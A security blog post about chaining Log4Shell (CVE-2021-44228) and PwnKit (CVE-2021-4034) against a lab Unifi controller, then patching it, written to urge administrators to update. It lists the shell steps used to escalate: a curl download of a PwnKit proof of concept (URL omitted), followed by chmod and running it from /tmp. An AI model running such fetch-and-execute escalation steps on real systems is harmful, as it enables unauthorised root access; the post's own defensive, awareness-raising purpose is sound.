Pwn’d or Patched, you choose. Unifi, Log4J, and PwnKit

Written by Matt Lee

February 3, 2022

Pwn’d or Patched using CVE 2021-44228 (Log4Shell) and CVE 2021-4034 (PwnKit)

The earlier video –

If you read my initial writeup on the Unifi unpatched status you will know this is still a HUGE issue that needs to be solved.

The new stuff Pwn’d or Patched, you choose –

I have recorded a video walkthrough of the post comprimisation steps here.

The setup – Compromising with CVE 2021-44228 (Log4Shell)

Initially I followed a great guide by Sprocket Security on compromising the Unifi Controller with CVE-2021-44228. That guide walked through gaining access and then amazing work on post exploitation inside the controller application, but not so much on privilege escalation directly at the point of compromise. I started wondering, with all 5,000 vulnerable Unifi Controllers out there, is there a way to compromise the controller and either make it more secure, or do very malicious things within that network or underlying supported services.. Guess what….. YES THERE IS… But I am going to do the good thing! (Caveat, I own this controller it is in a lab. Public IPs but no assets of merit)

The Code Walkthrough – Elevating Priv and Patching using CVE 2021-4034

After you have gained a foothold as described above by Sprocket Security, instead of pivoting into the Software controller, I decided to try to string together another vulnerability and that came in the form of PwnKit or CVE-2021-4034. A simple download of POC Shell code found here, written by Oliver Lyak from Denmark, provided a simple method of escalation. Here is the rough command lines used to finish the escalation:

  • curl -fsSL -o ./tmp/PwnKit
  • cd /tmp
  • chmod +x ./PwnKit
  • ./PwnKit

Now it is time to be the White Hat in this situation –

  • apt update
  • apt upgrade

Following the prompts I patched the vulnerabilities all at once. The unifi software update to 6.5.55 fixed the Log4Shell vulnerability and updating pollkit fixed the PwnKit vulnerability. As a result, the unifi controller is no longer vulnerable to the string and the kill chain is broken!

The takeaway –

Patch your stuff, so I dont have to. If someone with basic skills in ethical hacking can do it, the threat actors will certainly do it and likely already are.


You May Also Like…

Live Compromised

Live Compromised

Threat actors will always win. Let that sink in for a second, accept it, hate it, disagree, it is proven time and...